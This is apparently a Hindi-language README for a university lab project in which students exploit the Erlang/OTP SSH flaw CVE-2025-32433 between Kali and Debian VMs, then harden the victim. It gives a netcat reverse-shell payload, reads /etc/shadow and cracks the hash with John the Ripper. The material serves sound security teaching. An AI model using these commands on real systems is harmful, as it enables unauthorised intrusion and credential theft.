
यह प्रोजेक्ट दो वर्चुअल मशीनों में एक वास्तविक दुनिया के आक्रमण-और-रक्षा परिदृश्य का अनुकरण करता है। आप एक Erlang/OTP SSH सर्वर में एक महत्वपूर्ण प्री-ऑथेंटिकेशन RCE भेद्यता (CVE-2025-32433) का शोषण करेंगे, निकाले गए पासवर्ड हैश को क्रैक करेंगे, और फिर फायरवॉल नियमों और पैचिंग के साथ पीड़ित मशीन को सख्त करेंगे।
कुल अंक: 20 | समय सीमा: कोई देर से प्रस्तुतिकरण स्वीकार नहीं किया जाएगा
यह परियोजना दो वर्चुअल मशीनों पर एक वास्तविक-विश्व हमला-और-बचाव परिदृश्य का अनुकरण करती है। आप Erlang/OTP SSH सर्वर में एक महत्वपूर्ण प्री-ऑथेंटिकेशन RCE भेद्यता (CVE-2025-32433) का शोषण करेंगे, निकाले गए पासवर्ड हैश को क्रैक करेंगे, और फिर फायरवॉल नियमों और पैचिंग के साथ पीड़ित मशीन को सुरक्षित करेंगे।
| भूमिका | OS |
|---|---|
| हमलावर | Kali Linux |
| पीड़ित | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| फ़ाइल | विवरण |
|---|---|
Debian-1.ova | पूर्व-निर्मित पीड़ित VM इमेज — अलग से डाउनलोड करें, देखें (GitHub के लिए बहुत बड़ी) |
Debian-1.ova): डाउनलोड लिंक — GitHub पर होस्ट करने के लिए बहुत बड़ा (~3GB)। अलग से डाउनलोड करें और नीचे वर्णित अनुसार VirtualBox/VMware में आयात करें।rockyou_txt.txt): इस रिपॉजिटरी में शामिल है, भाग 2 में पासवर्ड क्रैकिंग चरण के लिए उपयोग किया जाता है।Debian-1.ova और अपने Kali Linux VM को VirtualBox/VMware में लोड करें।ifconfig चलाएं (आमतौर पर 192.168.56.0/24 में)।nmap -p 2222 -sV -A <victim-IP>
खुले पोर्ट, सेवा संस्करण और Erlang हस्ताक्षर दस्तावेज़ित करें।
Kali को अस्थायी रूप से NAT पर स्विच करें रिपॉजिटरी को क्लोन करने के लिए, फिर वापस होस्ट-ओनली पर स्विच करें।
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
स्क्रिप्ट संपादित करें — HOST = "<victim-IP>" सेट करें और पेलोड अपडेट करें:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
टर्मिनल 1 (Kali) — लिस्नर शुरू करें:
nc -lvnp 4444
टर्मिनल 2 (Kali) — शोषण लॉन्च करें:
python3 CVE-2025-32433.py
रिवर्स शेल में, पहुंच की पुष्टि करने के लिए whoami और hostname चलाएं।
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
हैश प्रारूप (जैसे, $6$ = SHA-512), लिया गया समय, और प्राप्त सादा पाठ पासवर्ड दस्तावेज़ित करें।
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Kali से Nmap स्कैन और शोषण फिर से चलाएं — दस्तावेज़ित करें कि पोर्ट 2222 अब "Filtered" है और शोषण विफल हो जाता है।
Erlang/OTP को v27.3.3 या बाद के संस्करण में अपग्रेड करने के चरणों का दस्तावेज़ीकरण करें, जिसमें CVE-2025-32433 के लिए फिक्स शामिल है।
whoami/hostname), फ़्लैग कैप्चर के स्क्रीनशॉट के साथ पूर्ण रिपोर्टCVE-2025-32433 — Erlang/OTP SSH सर्वर में महत्वपूर्ण प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन। किसी भी क्रेडेंशियल एक्सचेंज से पहले दूषित SSH पैकेट भेजकर शोषणीय, एक अप्रमाणित हमलावर को पूर्ण शेल पहुंच प्रदान करता है।
Project Spring 2026 - Google Docs.pdf | डिलिवरेबल्स के साथ पूर्ण परियोजना निर्देश |
rockyou_txt.txt | John the Ripper के साथ निकाले गए पासवर्ड हैश को क्रैक करने के लिए उपयोग की जाने वाली वर्डलिस्ट |